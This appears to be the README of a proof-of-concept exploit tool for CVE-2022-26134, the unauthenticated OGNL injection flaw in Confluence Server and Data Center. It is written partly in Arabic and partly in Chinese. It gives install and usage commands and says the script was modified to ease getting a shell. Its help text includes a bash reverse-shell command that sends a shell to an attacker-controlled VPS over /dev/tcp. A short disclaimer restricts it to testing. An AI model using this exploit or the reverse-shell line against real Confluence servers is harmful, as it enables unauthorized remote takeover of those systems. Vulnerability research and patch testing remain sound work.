
يمكن للمهاجم عن بُعد، دون مصادقة في Confluence، إنشاء تعبير OGNL وحقنه، مما يتيح تنفيذ كود عشوائي على Confluence Server أو Data Center. تم تعديل الـ PoC بناءً على السكربت الحالي لتسهيل الحصول على shell.
يمكن للمهاجم عن بُعد، دون الحاجة إلى مصادقة، إنشاء تعبير OGNL وحقنه لتنفيذ تعليمات برمجية عشوائية على Confluence Server أو Data Center. تم تعديل الـ PoC لتسهيل الحصول على شل (getshell). المنفذ الشائع: 8090
pip3 install requests
______ _______ ____ ___ ____ ____ ____ __ _ _____ _ _
/ ___\ \ / | ____| |___ \ / _ |___ \|___ \ |___ \ / /_ / |___ /| || |
| | \ \ / /| _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_
| |___ \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__ _|
\____| \_/ |_____| |_____|\___|_____|_____| |_____|\___/|_|____/ |_|
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND
CVE-2022-26134
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
目标URL
-c COMMAND, --command COMMAND
执行命令(execute command),get shell:/bin/bash -c bash -i >& /dev/tcp/{vps ip}/{vps port} 0>&1
python3 CVE-2022-26134.py -t [server ip] -c [command] //执行命令
هذا السكربت مخصص للاستخدام الاختباري فقط، ولا يجوز استخدامه لأغراض أخرى.